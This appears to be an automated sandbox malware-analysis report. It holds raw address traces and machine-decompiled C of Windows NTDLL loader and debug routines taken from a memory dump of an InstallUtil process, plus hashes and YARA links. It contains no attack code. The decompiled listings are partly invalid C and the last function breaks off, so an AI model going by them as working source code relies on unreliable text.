0x0132b410
0x0132b410
0x0132b414
0x0132b414
0x0132b41b
0x0132b420
0x0132b423
0x0132b425
0x0132b427
0x0132b42a
0x0132b42d
0x0132b42d
0x0132b42a
0x0132b432
0x0132b436
0x0132b438
0x0132b43b
0x0132b43b
0x0132b449
0x0132b44e
0x0132b454
0x0132b458
0x0132b458
0x0132b45d
0x00000000
0x0132b45d
0x0132b3ed
0x00000000
0x00000000
0x00000000
0x012dd7df
0x012dd7d2
0x012dd7ca
0x0132b37c
0x0132b37e
0x0132b385
0x0132b38a
0x00000000
0x0132b38a
0x012dd742
0x012dd7f1
0x012dd7f8
0x0132b49b
0x0132b49b
0x012dd800
0x012dd837
0x012dd843
0x012dd845
0x012dd847
0x012dd84a
0x012dd84b
0x012dd84e
0x012dd857
0x012dd802
0x012dd802
0x012dd80d
0x00000000
0x012dd818
0x012dd818
0x012dd824
0x012dd831
0x0132b4a5
0x0132b4ab
0x0132b4b3
0x0132b4b8
0x0132b4bb
0x00000000
0x0132b4c1
0x0132b4c1
0x0132b4c8
0x00000000
0x0132b4ce
0x0132b4d4
0x0132b4e1
0x0132b4e3
0x0132b4e5
0x00000000
0x0132b4eb
0x0132b4f0
0x0132b4f2
0x012ddac9
0x012ddacc
0x012ddacf
0x012ddad1
0x012ddd78
0x012ddd78
0x012ddcf2
0x00000000
0x012ddad7
0x012ddad9
0x012ddadb
0x00000000
0x00000000
0x012ddae1
0x012ddae1
0x012ddae4
0x012ddae6
0x0132b4f9
0x0132b4f9
0x0132b500
0x012ddaec
0x012ddaec
0x012ddaf5
0x012ddaf8
0x012ddafb
0x012ddb03
0x012ddb11
0x012ddb16
0x012ddb19
0x012ddb1b
0x0132b52c
0x0132b531
0x0132b534
0x012ddb21
0x012ddb21
0x012ddb24
0x012ddcd9
0x012ddce2
0x012ddce5
0x012ddd6a
0x012ddd6d
0x00000000
0x012ddd73
0x0132b51a
0x0132b51c
0x0132b51f
0x0132b524
0x00000000
0x0132b524
0x012ddce7
0x012ddce7
0x012ddce7
0x00000000
0x012ddce7
0x00000000
0x012ddb2a
0x012ddb2c
0x012ddb31
0x012ddb33
0x012ddb36
0x012ddb39
0x012ddb3b
0x012ddb66
0x012ddb66
0x012ddb3d
0x012ddb3d
0x012ddb3e
0x012ddb46
0x012ddb47
0x012ddb49
0x012ddb4c
0x012ddb53
0x012ddb55
0x012ddb58
0x012ddb5a
0x0132b50a
0x0132b50f
0x0132b512
0x012ddb60
0x012ddb60
0x012ddb63
0x012ddb63
0x00000000
0x012ddb63
0x012ddb5a
0x012ddb3b
0x012ddb24
0x012ddb69
0x012ddb69
0x012ddb6c
0x012ddb6f
0x012ddb74
0x0132b557
0x0132b557
0x0132b55e
0x012ddb7a
0x012ddb7c
0x012ddb7f
0x012ddb82
0x012ddb85
0x00000000
0x012ddb8b
0x012ddb8b
0x012ddb8d
0x012ddb9b
0x012ddb9b
0x012ddb9d
0x012ddba0
0x012ddba2
0x012ddba4
0x012ddba7
0x012ddba9
0x012ddbae
0x012ddbae
0x012ddbb1
0x012ddbb4
0x012ddbb4
0x012ddbb7
0x012ddbba
0x012ddcd2
0x012ddcd4
0x00000000
0x012ddbc0
0x012ddbc0
0x012ddbd2
0x012ddbd7
0x012ddbda
0x012ddbdd
0x012ddbdf
0x00000000
0x012ddbe5
0x012ddbe5
0x012ddbee
0x012ddbf1
0x0132b541
0x0132b544
0x00000000
0x0132b546
0x0132b546
0x00000000
0x0132b546
0x012ddbf7
0x012ddbf7
0x012ddbfd
0x012ddbfd
0x012ddbff
0x012ddc0b
0x012ddc15
0x012ddc1b
0x012ddc1d
0x012ddc21
0x012ddc21
0x012ddc23
0x012ddc23
0x012ddc26
0x012ddc29
0x012ddc2b
0x00000000
0x00000000
0x012ddc31
0x012ddc34
0x012ddc36
0x012ddcbf
0x012ddcbf
0x012ddcc2
0x00000000
0x012ddc3c
0x012ddc41
0x012ddc43
0x00000000
0x012ddc45
0x012ddc45
0x012ddc47
0x00000000
0x012ddc4d
0x012ddc4d
0x012ddc50
0x012ddc52
0x012ddc55
0x012ddcfa
0x012ddcfe
0x012ddd08
0x012ddd0a
0x012ddd0c
0x00000000
0x012ddd12
0x012ddd15
0x012ddd2d
0x012ddd2f
0x012ddd32
0x012ddd35
0x00000000
0x012ddd35
0x012ddc5b
0x012ddc5b
0x012ddc5e
0x012ddc61
0x012ddc64
0x012ddc67
0x012ddc67
0x012ddc6a
0x012ddc6c
0x012ddc8e
0x012ddc8e
0x012ddc91
0x012ddc93
0x012ddcce
0x012ddcce
0x012ddc95
0x012ddc9c
0x012ddc6e
0x012ddc72
0x012ddc75
0x012ddc77
0x012ddc79
0x0132b551
0x0132b551
0x00000000
0x012ddc7f
0x012ddc7f
0x012ddc81
0x00000000
0x012ddc83
0x012ddc86
0x012ddc88
0x00000000
0x00000000
0x00000000
0x00000000
0x012ddc88
0x012ddc81
0x012ddc79
0x012ddc6c
0x012ddc55
0x012ddc47
0x012ddc43
0x00000000
0x012ddc36
0x012ddc23
0x00000000
0x012ddbff
0x012ddbf1
0x012ddbdf
0x012ddb8f
0x012ddb92
0x012ddb95
0x00000000
0x00000000
0x00000000
0x00000000
0x012ddb95
0x012ddb8d
0x012ddb85
0x012ddb74
0x012ddc9f
0x012ddca2
0x012ddcb0
0x012ddcb0
0x012ddad1
0x0132b4e5
0x0132b4c8
0x00000000
0x00000000
0x00000000
0x012dd831
0x012dd80d
0x00000000
0x012dd800
0x0132b47f
0x0132b485
0x00000000
0x0132b485
0x012dd665
0x012dd652
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 012DD898

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: eedf39e14f9d0da65e42ef9dbf9019c04772756fd76e83d784cc47696db2837e
Instruction ID: f4226dc1b84e33ad02aa50660401f61e244c425246e101b5ab765e29fe25f667
Opcode Fuzzy Hash: eedf39e14f9d0da65e42ef9dbf9019c04772756fd76e83d784cc47696db2837e
Instruction Fuzzy Hash: F6E1D230A1075ACFEB35DF68C880BA9B7B5BF45308F0501E9DA09AB2C5D774A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 012F513A Relevance: 1.8, APIs: 1, Instructions: 258
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E012F513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x13bd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0130D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E012E2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L012E4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0130F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E012DFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x13bb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0130B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x012f5142
0x012f514c
0x012f5150
0x012f5157
0x012f5159
0x012f515e
0x012f5165
0x012f5169
0x012f516c
0x012f5172
0x012f5176
0x012f517a
0x012f517a
0x012f517a
0x012f517f
0x01336d8b
0x01336d8e
0x01336d91
0x01336d95
0x01336d98
0x01336d9c
0x01336da0
0x01336da3
0x01336da7
0x01336e26
0x01336e26
0x01336e2a
0x012f51f9
0x012f51f9
0x012f51fe
0x01336e33
0x01336e33
0x01336e39
0x01336e3d
0x01336e46
0x01336e50
0x00000000
0x00000000
0x01336e52
0x01336e53
0x01336e56
0x01336e5d
0x00000000
0x00000000
0x00000000
0x01336e5f
0x01336e67
0x01336e77
0x01336e7f
0x01336e80
0x01336e88
0x01336e90
0x01336e9f
0x01336ea5
0x01336ea9
0x01336eb1
0x01336ebf
0x00000000
0x00000000
0x01336ecf
0x01336ed3
0x00000000
0x00000000
0x01336edb
0x01336ede
0x01336ee1
0x01336ee8
0x01336eeb
0x01336eed
0x01336ef0
0x01336ef4
0x01336ef8
0x01336efc
0x00000000
0x00000000
0x01336f0d
0x01336f11
0x01336f32
0x01336f37
0x01336f3b
0x01336f3e
0x01336f41
0x01336f46
0x00000000
0x00000000
0x01336f4c
0x01336f50
0x01336f50
0x01336f54
0x01336f62
0x01336f65
0x01336f6d
0x01336f7b
0x01336f7b
0x01336f93
0x01336f98
0x01336fa0
0x01336fa6
0x01336fb3
0x01336fb6
0x01336fbf
0x01336fc1
0x01336fd5
0x01336fda
0x01336fda
0x01336fdd
0x01336fe2
0x01336fe7
0x01336feb
0x01336fef
0x01336ff3
0x012f520c
0x012f520c
0x012f520f
0x012f5215
0x012f5234
0x012f523a
0x012f523a
0x012f5244
0x012f5245
0x012f5246
0x012f5251
0x012f5251
0x01336f13
0x01336f17
0x01336f17
0x01336f18
0x01336f1b
0x01336f1f
0x01336f23
0x00000000
0x01336f28
0x012f5204
0x012f5204
0x012f5208
0x00000000
0x012f5208
0x012f5185
0x012f5188
0x012f518a
0x012f518e
0x012f5195
0x01336db1
0x01336db5
0x01336db9
0x012f519b
0x012f519b
0x012f519e
0x012f51a7
0x012f51a9
0x012f51a9
0x012f51b5
0x012f51b8
0x012f51bb
0x012f51be
0x012f51c1
0x012f51c5
0x012f51c9
0x012f51cd
0x012f51cd
0x012f51d8
0x012f51dc
0x012f51e0
0x01336dcc
0x01336dd0
0x01336dd5
0x01336ddd
0x01336de1
0x01336de1
0x01336de5
0x01336deb
0x01336df1
0x01336df7
0x01336dfd
0x01336e01
0x01336e05
0x01336e09
0x01336e0d
0x01336e11
0x01336e11
0x012f51eb
0x01336e1a
0x01336e1f
0x01336e21
0x01336e23
0x00000000
0x012f51f1
0x012f51f1
0x00000000
0x012f51f1

APIs

RtlDebugPrintTimes.NTDLL ref: 012F5234

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 5e5bfe7f0647793d8f3f2a51c5b3b8b87824e232c850fc8f1de1021f22cd1bef
Instruction ID: 35c5ab7befe460a589d6d56151216a25a6885c380a77eb1d85b36f33586a2d69
Opcode Fuzzy Hash: 5e5bfe7f0647793d8f3f2a51c5b3b8b87824e232c850fc8f1de1021f22cd1bef
Instruction Fuzzy Hash: 59C153B55083819FD354CF28C581A6AFBF1BF88308F184A6EF9998B352D370E945CB56

Uniqueness

Uniqueness Score: -1.00%

Function 012F03E2 Relevance: 1.8, APIs: 1, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E012F03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x13bd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E012F0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0130B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E012DB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x13b7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E012E7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E012E7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01347016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01309830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E013469A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x13b7c04 != 0) {
						_t118 = _v12;
						_t120 = E0134A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x13b7bd8;
						if( *0x13b7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E013095D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E013099A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01343540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E012CB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0130AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x13b8474 - 3;
										if( *0x13b8474 != 3) {
											 *0x13b79dc =  *0x13b79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E012E7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E012E7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01347016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x13b8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x13b7b00; // 0x0
							asm("ror esi, cl");
							 *0x13bb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E013095D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E012D7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x012f03f1
0x012f03f7
0x012f03f9
0x012f03fb
0x012f03fd
0x012f0400
0x012f040a
0x01334c7a
0x012f0537
0x012f0547
0x012f0410
0x012f0410
0x012f0414
0x012f0417
0x012f041a
0x012f0421
0x012f0424
0x012f042b
0x012f043b
0x012f043e
0x012f043f
0x012f043f
0x012f0446
0x012f0449
0x012f044c
0x012f044f
0x012f0459
0x01334c8d
0x012f045f
0x012f045f
0x012f045f
0x012f0467
0x01334c97
0x01334c9d
0x01334ca4
0x01334caa
0x01334caf
0x01334cb1
0x01334cc3
0x01334cb3
0x01334cbc
0x01334cbc
0x01334cc8
0x01334ccb
0x01334cd7
0x01334cda
0x01334cdf
0x01334cdf
0x01334ccb
0x01334ca4
0x012f046d
0x012f046f
0x012f046f
0x012f0471
0x012f0476
0x012f047a
0x012f047b
0x012f0483
0x012f0489
0x012f048d
0x00000000
0x00000000
0x01334ce9
0x01334cef
0x01334d22
0x01334d22
0x00000000
0x01334d22
0x01334cf1
0x01334cf7
0x00000000
0x00000000
0x01334cf9
0x01334cff
0x00000000
0x00000000
0x01334d05
0x01334d07
0x00000000
0x00000000
0x01334d0d
0x01334d0f
0x01334d14
0x01334d16
0x00000000
0x00000000
0x01334d1c
0x01334d1c
0x012f0499
0x012f0535
0x012f0535
0x00000000
0x012f0535
0x012f04a6
0x01334d2c
0x01334d37
0x01334d39
0x01334d3b
0x00000000
0x00000000
0x01334d41
0x01334d48
0x012f0527
0x012f052b
0x012f052d
0x012f0530
0x012f0530
0x00000000
0x012f052b
0x01334d4e
0x012f04ac
0x012f04ac
0x012f04af
0x012f04b2
0x012f04b7
0x012f04b9
0x012f04bb
0x012f04bd
0x012f04bf
0x012f04c5
0x012f04c9
0x01334d53
0x01334d59
0x01334db9
0x01334dba
0x01334dbf
0x01334dc2
0x01334dc4
0x01334dc7
0x01334dce
0x00000000
0x01334dce
0x01334d5b
0x01334d61
0x00000000
0x00000000
0x01334d63
0x01334d69
0x00000000
0x00000000
0x01334d6b
0x01334d6e
0x01334d74
0x01334d76
0x01334d7c
0x01334d7e
0x01334d84
0x01334d89
0x01334d8c
0x01334d8d
0x01334d92
0x01334d95
0x01334d96
0x01334d98
0x01334d9a
0x01334d9f
0x01334da4
0x01334da6
0x01334da8
0x01334daf
0x01334db1
0x01334db1
0x01334daf
0x01334da6
0x01334d84
0x01334d7c
0x00000000
0x01334d74
0x012f04d6
0x01334de1
0x012f04dc
0x012f04dc
0x012f04dc
0x012f04e4
0x01334deb
0x01334df1
0x01334df8
0x01334dfe
0x01334e03
0x01334e05
0x01334e17
0x01334e07
0x01334e10
0x01334e10
0x01334e1c
0x01334e1f
0x01334e35
0x01334e35
0x01334e1f
0x01334df8
0x012f04f1
0x012f04fa
0x01334e3f
0x01334e47
0x01334e5b
0x01334e61
0x01334e67
0x01334e69
0x01334e71
0x01334e73
0x012f0500
0x012f0500
0x012f0500
0x012f04fa
0x012f0508
0x012f051d
0x012f051d
0x012f051f
0x012f0524
0x00000000
0x012f0524
0x012f0515
0x012f0517
0x01334e7a
0x01334e7c
0x00000000
0x00000000
0x01334e85
0x00000000
0x01334e85
0x00000000
0x012f0517

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71c58de7c9ebe2c28d10e6fb3a173704e648c3fdd58c7a885ef1816bff18733b
Instruction ID: aa67849905d9884f1e5480309581b5f4dca938a206fb1b7cdb22a3d4ddc96932
Opcode Fuzzy Hash: 71c58de7c9ebe2c28d10e6fb3a173704e648c3fdd58c7a885ef1816bff18733b
Instruction Fuzzy Hash: 8A912931E10259AFEB329B6CC848BADBBE5EB41718F050279FB11A72D2D7749C00C799

Uniqueness

Uniqueness Score: -1.00%

Function 012CB171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E012CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x139f7a8);
				E0131D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
